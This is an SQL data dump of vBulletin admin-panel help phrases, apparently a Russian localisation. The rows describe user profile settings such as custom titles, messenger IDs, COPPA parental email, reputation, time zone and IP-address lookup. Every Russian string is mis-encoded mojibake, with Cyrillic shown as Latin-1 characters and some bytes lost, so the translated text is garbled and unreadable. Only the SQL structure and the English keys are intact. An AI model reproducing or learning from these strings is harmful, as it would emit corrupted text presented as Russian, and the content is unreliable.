(24212, -1, 'user_add_edit_customtitle_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëü áóäåò èìåòü ñòà òóñ, ïðèñâîåÃÃûé äëÿ åãî îñÃîâÃîé ãðóïïû ïîëüçîâà òåëåé.\r\n \r\nÊîãäà óñòà ÃîâëåÃî Ãà \"Äà , Ãà ñòðîéêà ïîëüçîâà òåëÿ\", òî ïîëüçîâà òåëüñêèé ñòà òóñ áóäåò çà ìåøà òåì, ÷òî Ãà ïèñà Ãî â ýòîì ïîëå. Êîä HTML ÃÃ¥ äîïóñòèì, è ýòî òî æå ñà ìîå, ÷òî è åñëè áû ïîëüçîâà òåëü ââ¸ë ýòè äà ÃÃûå ÷åðåç ñâîþ ïà Ãåëü. Çà ìåÃà ñòà òóñà ïðîèçîéä¸ò òîëüêî â òîì ñëó÷à å, åñëè ïîëüçîâà òåëü Ãà õîäèòñÿ â ãðóïïå, êîòîðîé ðà çðåøåÃî ýòî ñäåëà òü.\r\n \r\nÊîãäà óñòà ÃîâëåÃî Ãà \"Äà , Ãà ñòðîéêà à äìèÃèñòðà òîðà (HTML ðà çðåø¸Ã)\", òî ñòà òóñ ïîëüçîâà òåëÿ áóäåò çà ìåøà òåì, ÷òî ââåäåÃî â ýòî ïîëå. Êîä HTML áóäåò îòîáðà æà òüñÿ êà ê åñòü. Ãòîò ñòà òóñ áóäåò çà ìåøÃ, äà æå åñëè ãðóïïà ïîëüçîâà òåëÿ ÃÃ¥ ïîçâîëÿåò ìåÃÿòü åãî.', 'vbulletin', '', 0, ''),
(24213, -1, 'user_add_edit_customtitle_title', 'cphelptext', 'Îñîáûé ñòà òóñ', 'vbulletin', '', 0, ''),
(24214, -1, 'user_add_edit_homepage_text', 'cphelptext', 'Ââåäèòå ñþäà äîìà øÃþþ ñòðà Ãè÷êó ïîëüçîâà òåëÿ (http://www... ).', 'vbulletin', '', 0, ''),
(24215, -1, 'user_add_edit_homepage_title', 'cphelptext', 'Äîìà øÃÿÿ ñòðà Ãè÷êà ', 'vbulletin', '', 0, ''),
(24216, -1, 'user_add_edit_birthday_text', 'cphelptext', 'Ââåäèòå ñþäà äà òó ðîæäåÃèÿ ïîëüçîâà òåëÿ. Âûáåðèòå ìåñÿö è ââåäèòå äâå öèôðû äÃÿ è ÷åòûðå - ãîäà .', 'vbulletin', '', 0, ''),
(24217, -1, 'user_add_edit_birthday_title', 'cphelptext', 'ÄåÃü ðîæäåÃèÿ', 'vbulletin', '', 0, ''),
(24218, -1, 'user_add_edit_showbirthday_text', 'cphelptext', 'Âûáåðèòå çäåñü óðîâåÃü ñåêðåòÃîñòè äëÿ äÃÿ ðîæäåÃèÿ ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24219, -1, 'user_add_edit_showbirthday_title', 'cphelptext', 'ÊîÃôèäåÃöèà ëüÃîñòü', 'vbulletin', '', 0, ''),
(24220, -1, 'user_add_edit_signature_text', 'cphelptext', 'Ââåäèòå çäåñü ïîäïèñü ïîëüçîâà òåëÿ. Ãà ñïîçÃà âà Ãèå HTML, BB êîäîâ è ñìà éëîâ îïðåäåëÿåòñÿ ýòèìè Ãà ñòðîéêà ìè .', 'vbulletin', 'zCarot', 1206964560, '3.7.0 Release Candidate 2'),
(24221, -1, 'user_add_edit_signature_title', 'cphelptext', 'Ãîäïèñü', 'vbulletin', '', 0, ''),
(24222, -1, 'user_add_edit_icq_text', 'cphelptext', 'Ââåäèòå ñþäà Ãîìåð ICQ. \r\nICQ - ïîïóëÿðÃûé ñåðâèñ áûñòðûõ ñîîáùåÃèé. ÓçÃà éòå áîëüøå î øì Ãà äîìà øÃåé ñòðà Ãèöå ICQ . \r\nÇäåñü ìîæåò áûòü âà øà ðåêëà ìà ïî ðà çäà ÷å/ïðîäà æå êðà ñèâûõ Ãîìåðêîâ ;))', 'vbulletin', '', 0, ''),
(24223, -1, 'user_add_edit_icq_title', 'cphelptext', 'Ãîìåð ICQ', 'vbulletin', '', 0, ''),
(24224, -1, 'user_add_edit_aim_text', 'cphelptext', 'Ââåäèòå ñþäà AIM èìÿ ïîëüçîâà òåëÿ. \r\nAIM - ïîïóëÿðÃûé ñåðâèñ áûñòðûõ ñîîáùåÃèé. ÓçÃà éòå áîëüøå î øì Ãà äîìà øÃåé ñòðà Ãèöå AIM .', 'vbulletin', '', 0, ''),
(24225, -1, 'user_add_edit_aim_title', 'cphelptext', 'Èìÿ â AIM', 'vbulletin', '', 0, ''),
(24226, -1, 'user_add_edit_yahoo_text', 'cphelptext', 'Ââåäèòå Ãîìåð Yahoo! Messenger`à ïîëüçîâà òåëÿ. \r\nYahoo! Messenger - ïîïóëÿðÃûé ñåðâèñ ìãÃîâåÃÃûõ ñîîáùåÃèé. ÓçÃà éòå áîëüøå îá ýòîì Ãà ñòðà Ãèöå Yahoo! Messenger`à .', 'vbulletin', '', 0, ''),
(24227, -1, 'user_add_edit_yahoo_title', 'cphelptext', 'Ãîìåð Yahoo!', 'vbulletin', '', 0, ''),
(24228, -1, 'user_add_edit_msn_text', 'cphelptext', 'Ââåäèòå ñþäà èìÿ â MSN ïîëüçîâà òåëÿ. \r\n \r\nMSN Messenger - ïîïóëÿðÃûé ñåðâèñ áûñòðûõ ñîîáùåÃèé. ÓçÃà éòå áîëüøå î øì Ãà äîìà øÃåé ñòðà Ãèöå MSN Messenger .', 'vbulletin', '', 0, ''),
(24229, -1, 'user_add_edit_msn_title', 'cphelptext', 'Èìÿ MSN', 'vbulletin', '', 0, ''),
(24230, -1, 'user_add_edit_skype_text', 'cphelptext', 'Ââåäèòå ñþäà èìÿ ïîëüçîâà òåëÿ â Skype. \r\n \r\nÈìåÃà â Skype ìîãóò áûòü ÃÃ¥ ìåÃåå 6 ñèìâîëîâ è ñîäåðæà ò ëà òèÃñêèå áóêâû, öèôðû, ñèìâîëû ïîä÷¸ðêèâà Ãèÿ, äåôèñû, çà ïÿòûå è ïðîáåëû. \r\n \r\nSkype - ïîïóëÿðÃûé ñåðâèñ ïåðåäà ÷è ãîëîñà ÷åðåç èÃòåðÃåò (voice-over-IP) è òåëåôîÃèè. ×òîáû óçÃà òü áîëüøå, ïîñåòèòå âåá-ñà éò Skype .', 'vbulletin', '', 0, ''),
(24231, -1, 'user_add_edit_skype_title', 'cphelptext', 'Èìÿ â Skype', 'vbulletin', '', 0, ''),
(24232, -1, 'user_add_edit_coppauser_text', 'cphelptext', 'COPPA-ïîëüçîâà òåëü - ïîëüçîâà òåëü ìëà äøå 13 ëåò. COPPA - çà êîÃ, òðåáóþùèé ðà çðåøåÃèÿ ðîäèòåëåé äåòåé ìëà äøå 13 ëåò äî òîãî, êà ê îÃè ñìîãóò ïèñà òü Ãà ôîðóìå. \r\n×òîáû óçÃà òü áîëüøå îá ýòîì çà êîÃÃ¥, ñìîòðèòå çäåñü: http://www.ftc.gov/bcp/edu/pubs/business/idtheft/bus45.shtm .', 'vbulletin', 'zCarot', 1231760784, '3.8.1'),
(24233, -1, 'user_add_edit_coppauser_title', 'cphelptext', 'COPPA', 'vbulletin', '', 0, ''),
(24234, -1, 'user_add_edit_parentemail_text', 'cphelptext', 'Ââåäèòå ñþäà à äðåñ ýëåêòðîÃÃîé ïî÷òû ðîäèòåëåé ïîëüçîâà òåëÿ. Ãòî òðåáóåòñÿ òîëüêî äëÿ COPPA-ïîëüçîâà òåëåé. \r\n×òîáû óçÃà òü áîëüøå îá ýòîì çà êîÃÃ¥, ñìîòðèòå çäåñü: http://www.ftc.gov/bcp/edu/pubs/business/idtheft/bus45.shtm .', 'vbulletin', 'zCarot', 1231760784, '3.8.1'),
(24235, -1, 'user_add_edit_parentemail_title', 'cphelptext', 'Àäðåñ ýëåêòðîÃÃîé ïî÷òû ðîäèòåëåé', 'vbulletin', '', 0, ''),
(24236, -1, 'user_add_edit_posts_text', 'cphelptext', 'Ãòî ñ÷¸ò÷èê ñîîáùåÃèé ïîëüçîâà òåëÿ. Ñ÷¸ò÷èê ñîîáùåÃèé ïîëüçîâà òåëÿ ìîæåò áûòü èñêóññòâåÃÃî èçìåøà ñ ïîìîùüþ ðåäà êòèðîâà Ãèÿ ýòîãî ïîëÿ. \r\nÃîìÃèòå, ÷òî åñëè âû îáÃîâèòå ñ÷¸ò÷èêè ñîîáùåÃèé ïîëüçîâà òåëåé çäåñü , òî âñå èçìåøÃÃûå èñêóññòâåÃÃûì îáðà çîì ñ÷¸ò÷èêè âåðÃóò ñâîè Ãà ñòîÿùèå çÃà ÷åÃèÿ.', 'vbulletin', 'zCarot', 1205942825, '3.7.0 Release Candidate 1'),
(24237, -1, 'user_add_edit_posts_title', 'cphelptext', 'Ñ÷åò÷èê ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(24238, -1, 'user_add_edit_referrerid_text', 'cphelptext', 'Ââåäèòå ID ïîëüçîâà òåëÿ, êîòîðûé ïðèãëà ñèë ýòîãî ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24239, -1, 'user_add_edit_referrerid_title', 'cphelptext', 'Ãåôåððåð', 'vbulletin', '', 0, ''),
(24240, -1, 'user_add_edit_ipaddress_text', 'cphelptext', 'Ãòî IP à äðåñ ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24241, -1, 'user_add_edit_ipaddress_title', 'cphelptext', 'IP à äðåñ', 'vbulletin', '', 0, ''),
(24242, -1, 'user_add_edit_usergroupid_text', 'cphelptext', 'Âûáåðèòå îñÃîâÃóþ ãðóïïó äëÿ ýòîãî ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24243, -1, 'user_add_edit_usergroupid_title', 'cphelptext', 'ÎñÃîâÃà ÿ ãðóïïà ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24244, -1, 'user_add_edit_membergroupids_text', 'cphelptext', 'Âûáåðèòå âñå äîïîëÃèòåëüÃûå ãðóïïû ïîëüçîâà òåëåé, ÷ëåÃà ìè êîòîðûõ ÿâëÿåòñÿ ýòîò ïîëüçîâà òåëü.', 'vbulletin', '', 0, ''),
(24245, -1, 'user_add_edit_membergroupids_title', 'cphelptext', 'ÄîïîëÃèòåëüÃûå ãðóïïû ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24246, -1, 'user_add_edit_showreputation_text', 'cphelptext', 'Îïöèÿ îïðåäåëÿåò, áóäåò ëè âèäèìîé ðåïóòà öèÿ ýòîãî ïîëüçîâà òåëÿ äëÿ äðóãèõ ïîñåòèòåëåé ôîðóìà .', 'vbulletin', '', 0, ''),
(24247, -1, 'user_add_edit_showreputation_title', 'cphelptext', 'Ãîêà çûâà òü ðåïóòà öèþ', 'vbulletin', '', 0, ''),
(24248, -1, 'user_add_edit_reputation_text', 'cphelptext', 'Ââåäèòå òåêóùèé óðîâåÃü ðåïóòà öèè ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24249, -1, 'user_add_edit_reputation_title', 'cphelptext', 'ÓðîâåÃü ðåïóòà öèè', 'vbulletin', '', 0, ''),
(24250, -1, 'user_add_edit_reputationpower_text', 'cphelptext', 'Òåêóùèé âåñ ðåïóòà öèè âû÷èñëÿåòñÿ ñ ïîìîùüþ îïöèé, óñòà ÃîâëåÃÃûõ â ðà çäåëå \"Ãåïóòà öèÿ\" îñÃîâÃûõ Ãà ñòðîåê. Îòðèöà òåëüÃûå êîììåÃòà ðèè èìåþò ïîëîâèÃó ýòîãî âåñà (çà èñêëþ÷åÃèåì à äìèÃèñòðà òîðîâ, ó Ãèõ - ïîëÃûé).', 'vbulletin', '', 0, ''),
(24251, -1, 'user_add_edit_reputationpower_title', 'cphelptext', 'Òåêóùèé âåñ ðåïóòà öèè', 'vbulletin', '', 0, ''),
(24252, -1, 'user_add_edit_adminemail_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ïîëó÷à òü ïîëüçîâà òåëü ýëåêòðîÃÃûå ñîîáùåÃèÿ îò à äìèÃèñòðà öèè, îòïðà âëåÃÃûå à äìèÃèñòðà òîðà ìè ÷åðåç Ãà Ãåëü à äìèÃèñòðà òîðà -> Ãîëüçîâà òåëè -> Îòïðà âëåÃèå ýëåêòðîÃÃîãî ïèñüìà ïîëüçîâà òåëÿì .', 'vbulletin', '', 0, ''),
(24253, -1, 'user_add_edit_adminemail_title', 'cphelptext', 'Ãîëó÷à òü ýëåêòðîÃÃûå ïèñüìà îò à äìèÃèñòðà öèè', 'vbulletin', '', 0, ''),
(24254, -1, 'user_add_edit_showemail_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, ìîæåò ëè ïîëüçîâà òåëü ïîëó÷à òü ýëåêòðîÃÃûå ñîîáùåÃèÿ, îòïðà âëåÃÃûå äðóãèìè ó÷à ñòÃèêà ìè.', 'vbulletin', '', 0, ''),
(24255, -1, 'user_add_edit_showemail_title', 'cphelptext', 'Ãîëó÷à òü ýëåêòðîÃÃûå ïèñüìà îò äðóãèõ ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24256, -1, 'user_add_edit_invisible_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü áóäåò ñêðûò Ãà ñòðà Ãèöå \"Êòî Ãà ôîðóìå\" äëÿ âñåõ ó÷à ñòÃèêîâ, êðîìå òåõ, êîòîðûå ñîñòîÿò â ãðóïïà õ ïîëüçîâà òåëåé ñ ðà çðåø¸ÃÃûìè ïðà âà ìè ïðîñìîòðà Ãåâèäèìûõ ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(24257, -1, 'user_add_edit_invisible_title', 'cphelptext', 'Ãåâèäèìûé ðåæèì', 'vbulletin', '', 0, ''),
(24258, -1, 'user_add_edit_showvcard_text', 'cphelptext', 'Óñòà Ãà âëèâà ÿ ýòó îïöèþ â \"Äà \", âû ðà çðåøèòå ïîëüçîâà òåëÿì çà ãðóæà òü vCard èç ïðîôèëÿ ýòîãî ïîëüçîâà òåëÿ. vCard èñïîëüçóþòñÿ âî ìÃîæåñòâå ìåÃåäæåðîâ êîÃòà êòîâ è êëèåÃòà õ ýëåêòðîÃÃîé ïî÷òû.', 'vbulletin', '', 0, ''),
(24259, -1, 'user_add_edit_showvcard_title', 'cphelptext', 'Ãà çðåøèòü çà ãðóçêó vCard', 'vbulletin', '', 0, ''),
(24260, -1, 'user_add_edit_receivepm_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, ìîæåò ïîëüçîâà òåëü ïîëó÷à òü ëè÷Ãûå ñîîáùåÃèÿ èëè Ãåò.', 'vbulletin', '', 0, ''),
(24261, -1, 'user_add_edit_receivepm_title', 'cphelptext', 'Ãîëó÷à òü ëè÷Ãûå ñîîáùåÃèÿ (ËÑ)', 'vbulletin', '', 0, ''),
(24262, -1, 'user_add_edit_receivepmbuddies_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò ïîëó÷à òü ëè÷Ãûå ñîîáùåÃèÿ òîëüêî îò ïîëüçîâà òåëåé â ñïèñêå çÃà êîìûõ è ìîäåðà òîðîâ/à äìèÃèñòðà òîðîâ.', 'vbulletin', 'zCarot', 1199284204, '3.7.0 Beta 4'),
(24263, -1, 'user_add_edit_receivepmbuddies_title', 'cphelptext', 'Ãîëó÷à òü ëè÷Ãûå ñîîáùåÃèÿ òîëüêî îò çÃà êîìûõ è ìîäåðà òîðîâ', 'vbulletin', 'zCarot', 1199283736, '3.7.0 Beta 4'),
(24264, -1, 'user_add_edit_emailonpm_text', 'cphelptext', 'Åñëè âêëþ÷åÃà , òî ïîëüçîâà òåëü áóäåò ïîëó÷à òü óâåäîìëåÃèÿ ïî ýëåêòðîÃÃîé ïî÷òå ïðè ïîëó÷åÃèè Ãîâîãî ëè÷Ãîãî ñîîáùåÃèÿ.', 'vbulletin', '', 0, ''),
(24265, -1, 'user_add_edit_emailonpm_title', 'cphelptext', 'Ãîñûëà òü óâåäîìëåÃèå ïî ýëåêòðîÃÃîé ïî÷òå ïðè ïîëó÷åÃèè ëè÷Ãîãî ñîîáùåÃèÿ', 'vbulletin', '', 0, ''),
(24266, -1, 'user_add_edit_pmpopup_text', 'cphelptext', 'Åñëè âêëþ÷åÃî, òî ïîëüçîâà òåëþ áóäóò ñîîáùà òü î ïîñòóïëåÃèè Ãîâîãî ëè÷Ãîãî ñîîáùåÃèÿ ÷åðåç âñïëûâà þùåå îêÃî (åñëè îà Ãà õîäèòñÿ Ãà ôîðóìå).', 'vbulletin', '', 0, ''),
(24267, -1, 'user_add_edit_pmpopup_title', 'cphelptext', 'Îòêðûâà òü âñïëûâà þùåå îêÃî, êîãäà ïîëó÷åÃî ëè÷Ãîå ñîîáùåÃèå', 'vbulletin', '', 0, ''),
(24268, -1, 'user_add_edit_showsignatures_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, âèäèò ëè ýòîò ïîëüçîâà òåëü ïîäïèñè â ñîîáùåÃèÿõ.', 'vbulletin', '', 0, ''),
(24269, -1, 'user_add_edit_showsignatures_title', 'cphelptext', 'Îòîáðà æà òü ïîäïèñè', 'vbulletin', '', 0, ''),
(24270, -1, 'user_add_edit_showavatars_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, âèäèò ëè ýòîò ïîëüçîâà òåëü à âà òà ðû ïðè ïðîñìîòðå ñîîáùåÃèé. Ãîëüçîâà òåëè ñ ìåäëåÃÃûì ñîåäèÃÃ¥Ãèåì ìîãóò âûêëþ÷èòü ýòó îïöèþ äëÿ óñêîðåÃèÿ çà ãðóçêè Ãà ôîðóìà õ, ãäå ìÃîãî áîëüøèõ (ïî ðà çìåðó ôà éëà ) à âà òà ðîâ.', 'vbulletin', '', 0, ''),
(24271, -1, 'user_add_edit_showavatars_title', 'cphelptext', 'Îòîáðà æà òü à âà òà ðû', 'vbulletin', '', 0, ''),
(24272, -1, 'user_add_edit_showimages_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, âèäèò ëè ýòîò ïîëüçîâà òåëü èçîáðà æåÃèÿ, âëîæåÃÃûå â ñîîáùåÃèÿ. Ãîëüçîâà òåëè ñ ìåäëåÃÃûì ñîåäèÃÃ¥Ãèåì ìîãóò âûêëþ÷èòü ýòó îïöèþ äëÿ óñêîðåÃèÿ çà ãðóçêè òåì ñ áîëüøèì ÷èñëîì âëîæåÃÃûõ èçîáðà æåÃèé.', 'vbulletin', '', 0, ''),
(24273, -1, 'user_add_edit_showimages_title', 'cphelptext', 'Îòîáðà æà òü èçîáðà æåÃèÿ', 'vbulletin', '', 0, ''),
(24274, -1, 'user_add_edit_showusercss_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, âèäèò ëè ýòîò ïîëüçîâà òåëü èçìåÃÃ¥Ãèÿ â îòîáðà æåÃèè ÷óæèõ ïðîôèëåé', 'vbulletin', 'zCarot', 1199283907, '3.7.0 Beta 4'),
(24275, -1, 'user_add_edit_showusercss_title', 'cphelptext', 'Ãîääåðæèâà òü ÷óæèå ñòèëè îòîáðà æåÃèÿ ïðîôèëÿ', 'vbulletin', 'zCarot', 1199283907, '3.7.0 Beta 4'),
(24276, -1, 'user_add_edit_receivefriendemailrequest_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, áóäåò ëè ýòîò ïîëüçîâà òåëü ïîëó÷à òü óâåäîìëåÃèÿ ïî ýëåêòðîÃÃîé ïî÷òå î Ãîâûõ ïðåäëîæåÃèÿõ äðóæáû.', 'vbulletin', 'zCarot', 1199283977, '3.7.0 Beta 4'),
(24277, -1, 'user_add_edit_receivefriendemailrequest_title', 'cphelptext', 'Ãîëó÷à òü óâåäîìëåÃèÿ î çà ïðîñå Ãà ïîëó÷åÃèå ñòà òóñà äðóãà ', 'vbulletin', 'zCarot', 1199283977, '3.7.0 Beta 4'),
(24278, -1, 'user_add_edit_autosubscribe_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò îáû÷Ãûé óðîâåÃü ïîäïèñêè ïðè îñòà âëåÃèè ñîîáùåÃèÿ ïîëüçîâà òåëåì.', 'vbulletin', '', 0, ''),
(24279, -1, 'user_add_edit_autosubscribe_title', 'cphelptext', 'Àâòîìà òè÷åñêèé ðåæèì ïîäïèñêè Ãà òåìó', 'vbulletin', '', 0, ''),
(24280, -1, 'user_add_edit_threadedmode_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò ôîðìà ò îòîáðà æåÃèÿ òåìû, ïðè ïðîñìîòðå å¸ ñîîáùåÃèé. \r\n ëèÃåéÃîì ðåæèìå âñå ñîîáùåÃèÿ ðà ñïîëà ãà þòñÿ â õðîÃîëîãè÷åñêîì ïîðÿäêå îò ñòà ðûõ ê Ãîâûì. Òà ê âû ìîæåòå ïðîñìà òðèâà òü ñîîáùåÃèÿ áåç Ãåîáõîäèìîñòè Ãà æèìà òü Ãà ññûëêè. \r\n äðåâîâèäÃîì ðåæèìå òåìà âûãëÿäèò êà ê ñòâîë äåðåâà , ãäå êà æäà ÿ âåòêà èìååò îäÃî ñîîáùåÃèå. Ãòî ïîçâîëÿåò âèäåòü, êòî è Ãà êà êèå ñîîáùåÃèå îòâå÷à ë. ÎäÃîâðåìåÃÃî îòîáðà æà åòñÿ òåêñò òîëüêî îäÃîãî ñîîáùåÃèÿ. \r\nÊîìáèÃèðîâà ÃÃûé ðåæèì îáúåäèÃÿåò äâà ïðåäûäóùèõ. Ãà âåðõó ñîîáùåÃèÿ îòîáðà æåÃû â âèäå äåðåâà , âÃèçó - îáû÷Ãûé ëèÃåéÃûé âèä.', 'vbulletin', 'zCarot', 1205942524, '3.7.0 Release Candidate 1'),
(24281, -1, 'user_add_edit_threadedmode_title', 'cphelptext', 'Âà ðèà Ãòû îòîáðà æåÃèÿ òåì', 'vbulletin', '', 0, ''),
(24282, -1, 'user_add_edit_showvbcode_text', 'cphelptext', 'Îïöèÿ îïðåäåëÿåò, êà êà ÿ ïà Ãåëü ðåäà êòîðà áóäåò îòîáðà æà òüñÿ ïðè ðà çìåùåÃèè ñîîáùåÃèé ïîëüçîâà òåëåì. Ãà Ãåëü ðåäà êòîðà ñîäåðæèò èêîÃêè äëÿ ïðîñòîé âñòà âêè ýëåìåÃòîâ BB êîäà â ñîîáùåÃèÿ. \r\nÑòà Ãäà ðòÃà ÿ ïà Ãåëü ðåäà êòîðà ñîäåðæèò èêîÃêè äëÿ âñåõ BB êîäîâ, ïîçâîëÿþùèõ âñòà âëÿòü ãîòîâûé êîä ïðÿìî â ñîîáùåÃèå. \r\nÃà ñøèðåÃÃà ÿ ïà Ãåëü âèçóà ëüÃîãî ðåäà êòîðà âêëþ÷à åò â ñåáÿ ôóÃêöèîÃà ëüÃîñòü ñòà Ãäà ðòÃîé ïà Ãåëè, Ãî åùå è îòîáðà æà åò ñîîáùåÃèå òà ê, êà ê îÃî áóäåò âûãëÿäåòü Ãà ôîðóìå (ïîõîæå, Ãà ðåäà êòèðîâà Ãèå â MS WORD).', 'vbulletin', 'zCarot', 1206964550, '3.7.0 Release Candidate 2'),
(24283, -1, 'user_add_edit_showvbcode_title', 'cphelptext', 'ÈÃòåðôåéñ ðåäà êòîðà ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(24284, -1, 'user_add_edit_styleid_text', 'cphelptext', 'Ãòî ñòèëü, êîòîðûé èñïîëüçóåòñÿ ó ýòîãî ïîëüçîâà òåëÿ äëÿ îòîáðà æåÃèÿ ñòðà Ãèö ôîðóìà . Âûáåðèòå ñòèëü ÿâÃî èëè óñòà Ãîâèòå ýòó îïöèþ â \"Êà ê â Ãà ñòðîéêà õ ôîðóìà \", ÷òîáû èñïîëüçîâà òü ñòèëü ïî óìîë÷à Ãèþ.', 'vbulletin', '', 0, ''),
(24285, -1, 'user_add_edit_styleid_title', 'cphelptext', 'Ñòèëü', 'vbulletin', '', 0, ''),
(24286, -1, 'user_add_edit_timezoneoffset_text', 'cphelptext', 'Âûáåðèòå ÷à ñîâîé ïîÿñ äëÿ ýòîãî ïîëüçîâà òåëÿ â çÃà ÷åÃèÿõ GMT.', 'vbulletin', '', 0, ''),
(24287, -1, 'user_add_edit_timezoneoffset_title', 'cphelptext', '×à ñîâîé ïîÿñ', 'vbulletin', '', 0, ''),
(24288, -1, 'user_add_edit_dstauto_text', 'cphelptext', 'Åñëè \"Äà \", òî âðåìÿ äëÿ ýòîãî ïîëüçîâà òåëÿ áóäåò à âòîìà òè÷åñêè ïåðåâîäèòñÿ ïðè Ãåîáõîäèìîñòè ñ ëåòÃåãî Ãà çèìÃåå è Ãà îáîðîò.', 'vbulletin', '', 0, ''),
(24289, -1, 'user_add_edit_dstauto_title', 'cphelptext', 'Îïðåäåëÿòü ëåòÃåå/çèìÃåå âðåìÿ à âòîìà òè÷åñêè', 'vbulletin', '', 0, ''),
(24290, -1, 'user_add_edit_dstonoff_text', 'cphelptext', 'Åñëè \"Äà \", òî ñåé÷à ñ â ÷à ñîâîì ïîÿñå ïîëüçîâà òåëÿ ëåòÃåå âðåìÿ. Ãòà îïöèÿ ìîæåò áûòü ïðîïóùåÃà , åñëè âêëþ÷åÃà îïöèÿ \"Îïðåäåëÿòü ëåòÃåå/çèìÃåå âðåìÿ à âòîìà òè÷åñêè\".', 'vbulletin', '', 0, ''),
(24291, -1, 'user_add_edit_dstonoff_title', 'cphelptext', ' Ãà ñòîÿùèé ìîìåÃò ëåòÃåå âðåìÿ', 'vbulletin', '', 0, ''),
(24292, -1, 'user_add_edit_daysprune_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò îáû÷Ãûé âîçðà ñò òåì, âèäèìûõ â ñïèñêå òåì ðà çäåëà ïîëüçîâà òåëåì.', 'vbulletin', '', 0, ''),
(24293, -1, 'user_add_edit_daysprune_title', 'cphelptext', 'Äà âÃîñòü îòîáðà æà åìûõ òåì ïî óìîë÷à Ãèþ', 'vbulletin', '', 0, ''),
(24294, -1, 'user_add_edit_joindate_text', 'cphelptext', 'Ââåäèòå ñþäà äà òó ðåãèñòðà öèè ïîëüçîâà òåëÿ. Âûáåðèòå ìåñÿö è ââåäèòå äâå öèôðû äÃÿ è ÷åòûðå öèôðû ãîäà .', 'vbulletin', '', 0, ''),
(24295, -1, 'user_add_edit_joindate_title', 'cphelptext', 'Ãåãèñòðà öèÿ', 'vbulletin', '', 0, ''),
(24296, -1, 'user_add_edit_lastactivity_text', 'cphelptext', 'Ââåäèòå äà òó ïîñëåäÃåé à êòèâÃîñòè ýòîãî ïîëüçîâà òåëÿ Ãà ôîðóìå. Âûáåðèòå ìåñÿö è ââåäèòå äâå öèôðû äÃÿ è ÷åòûðå - ãîäà , äâå - ÷à ñà è äâå - ìèÃóòû.', 'vbulletin', '', 0, ''),
(24297, -1, 'user_add_edit_lastactivity_title', 'cphelptext', 'ÃîñëåäÃÿÿ à êòèâÃîñòü', 'vbulletin', '', 0, ''),
(24298, -1, 'user_add_edit_lastpost_text', 'cphelptext', 'Ââåäèòå äà òó ïîñëåäÃåãî ñîîáùåÃèÿ îò ýòîãî ïîëüçîâà òåëÿ. Âûáåðèòå ìåñÿö è ââåäèòå äâå öèôðû äÃÿ è ÷åòûðå - ãîäà , äâå - ÷à ñà è äâå - ìèÃóòû.', 'vbulletin', '', 0, ''),
(24299, -1, 'user_add_edit_lastpost_title', 'cphelptext', 'ÃîñëåäÃåå ñîîáùåÃèå', 'vbulletin', '', 0, ''),
(24300, -1, 'user_changehistory_text', 'cphelptext', 'Ãòà ñòðà Ãèöà îòîáðà æà åò èñòîðèþ èçìåÃÃ¥Ãèé Ãåêîòîðûõ ïà ðà ìåòðîâ ïîëüçîâà òåëÿ, âêëþ÷à ÿ:\r\n\r\n\r\nÈìåÃà ïîëüçîâà òåëåé \r\nÀäðåñà ýëåêòðîÃÃîé ïî÷òû \r\nÃðèÃà äëåæÃîñòü ê ãðóïïà ì ïîëüçîâà òåëåé \r\n \r\n\r\nÒà êæå ñîõðà Ãÿþòñÿ äà ÃÃûå î ïîëüçîâà òåëå, êîòîðûé ïðîèçâ¸ë ýòè èçìåÃÃ¥Ãèÿ.', 'vbulletin', 'zCarot', 1191257642, '3.7.0 Beta 1'),
(24301, -1, 'user_changehistory_title', 'cphelptext', 'Èñòîðèÿ èçìåÃÃ¥Ãèé ïîëüçîâà òåëÿ', 'vbulletin', 'zCarot', 1191257642, '3.7.0 Beta 1'),
(24302, -1, 'user_doips_text', 'cphelptext', 'Çäåñü âû ìîæåòå ïîñìîòðåòü ñîîòâåòñòâèÿ èìåÃè ïîëüçîâà òåëÿ è åãî IP à äðåñîâ, è Ãà îáîðîò, IP à äðåñà è ïîëüçîâà òåëåé, êîòîðûå åãî èñïîëüçîâà ëè.', 'vbulletin', '', 0, ''),
(24303, -1, 'user_doips_title', 'cphelptext', 'Ãîèñê ïî IP à äðåñó', 'vbulletin', '', 0, ''),
(24304, -1, 'user_doips_ipaddress_text', 'cphelptext', 'Ââåäèòå ñþäà IP à äðåñ, ïî êîòîðîìó æåëà åòå Ãà éòè ïîëüçîâà òåëåé. Âû ìîæåòå ââåñòè êà ê ïîëÃûé IP (Ãà ïðèìåð, 123.222.244.211), òà ê è ÷à ñòè÷Ãûé (Ãà ïðèìåð, 123, èëè 123.222, èëè 123.222.244, èëè 123.222.2).ÃîìÃèòå: åñëè ó âà ñ î÷åÃü ìÃîãî ñîîáùåÃèé, òî ýòîò ïðîöåññ ìîæåò çà Ãÿòü ïðîäîëæèòåëüÃîå âðåìÿ. ', 'vbulletin', 'zCarot', 1199736638, '3.7.0 Beta 4'),
